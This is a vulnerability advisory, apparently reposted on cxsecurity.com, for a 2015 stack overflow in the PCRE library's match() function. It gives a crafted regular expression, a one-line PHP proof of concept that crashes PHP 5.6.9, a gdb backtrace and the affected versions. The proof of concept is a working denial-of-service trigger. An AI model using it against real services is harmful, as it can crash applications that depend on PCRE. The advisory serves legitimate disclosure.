PCRE Library Call Stack Overflow Vulnerability in match()

2015.06.03
Credit: Wen Guanxing
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

I. Summary PCRE is a regular expression C library inspired by the regular expression capabilities in the Perl programming language. The PCRE library is incorporated into a number of prominent programs, such as Adobe Flash, Apache, Nginx, PHP. PCRE library is prone to a vulnerability which leads to Stack Overflow. Without enough bound checking inside match(), the stack memory could be overflowed via a crafted regular expression. Since PCRE library is widely used, this vulnerability should affect many applications. At least, an attacker may exploit this issue to DOS the user running the affected application. ------------------------------------------------------------------ II. Description Latest version of PCRE is prone to a Stack Overflow vulnerability which could caused by the following regular expression. /^(?:(?(1)\\.|([^\\\\W_])?)+)+$/ To reproduce the problem, we could use pcretest provide by PCRE library or applications which is wrapped with PCRE such as PHP. For pcretest, simply type the regular expression after the re> For PHP, latest version of PHP 5.6.9 (wrapped with PCRE 8.37) could be triggered by following code snippet. <?php preg_match("/^(?:(?(1)\\\\.|([^\\\\\\\\W_])?)+)+$/","abcd",$arr); ?> Other versions and applications may also be affected. Following test is conveyed under Kali Linux (based on Debian x64) with php 5.6.9: ============================================================== (gdb) r poc.php Program received signal SIGSEGV, Segmentation fault. 0x000000000047294f in match (eptr=0x7ffff7eb7d91 "DLAB", ecode=0x10070ad "\035\\\fw", mstart=0x7ffff7eb7d90 "ADLAB", offset_top=4, md=0x7fffffffa9a0, eptrb=0x0, rdepth=11130) at /root/php-5.6.9/ext/pcre/pcrelib/pcre_exec.c:1439 1439 RMATCH(eptr, ecode, offset_top, md, eptrb, RM49); (gdb) bt #0 0x000000000047294f in match (eptr=0x7ffff7eb7d91 "DLAB", ecode=0x10070ad "\035\\\fw", mstart=0x7ffff7eb7d90 "ADLAB", offset_top=4, md=0x7fffffffa9a0, eptrb=0x0, rdepth=11130) at /root/php-5.6.9/ext/pcre/pcrelib/pcre_exec.c:1439 #1 0x000000000047e2ee in match (eptr=0x7ffff7eb7d91 "DLAB", ecode=0x10070dd "y", mstart=0x7ffff7eb7d90 "ADLAB", offset_top=4, md=<optimized out>, eptrb=0x0, rdepth=11129) at /root/php-5.6.9/ext/pcre/pcrelib/pcre_exec.c:2061 #2 0x0000000000472f45 in match (eptr=0x7ffff7eb7d90 "ADLAB", ecode=0x10070b4 "\205", mstart=0x7ffff7eb7d90 "ADLAB", offset_top=2, md=0x7fffffffa9a0, eptrb=0x7fffff7ffa00, rdepth=11128) at /root/php-5.6.9/ext/pcre/pcrelib/pcre_exec.c:983 #3 0x0000000000472e2d in match (eptr=0x7ffff7eb7d90 "ADLAB", ecode=0x10070b3 "\222\205", mstart=0x7ffff7eb7d90 "ADLAB", offset_top=2, md=0x7fffffffa9a0, eptrb=0x7fffff7ffa00, rdepth=11127) at /root/php-5.6.9/ext/pcre/pcrelib/pcre_exec.c:1878 #4 0x0000000000472957 in match (eptr=0x7ffff7eb7d90 "ADLAB", ecode=0x10070b3 "\222\205", mstart=0x7ffff7eb7d90 "ADLAB", offset_top=2, md=0x7fffffffa9a0, eptrb=0x0, rdepth=11126) at /root/php-5.6.9/ext/pcre/pcrelib/pcre_exec.c:1439 #5 0x000000000047e2ee in match (eptr=0x7ffff7eb7d90 "ADLAB", ecode=0x10070e0 "y", mstart=0x7ffff7eb7d90 "ADLAB", offset_top=2, md=<optimized out>, eptrb=0x0, rdepth=11125) ------------------------------------------------------------------ III. Impact Stack Overflow ------------------------------------------------------------------ IV. Affected PCRE 8.33, 8.34, 8.35, 8.36, 8.37 are confirmed to be vulnerable. PCRE2 10.10 is also confirmed to be vulnerable. Other applications may also be affected. ------------------------------------------------------------------ V. Credit Wen Guanxing from Venustech ADLAB is credited for this vulnerability.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top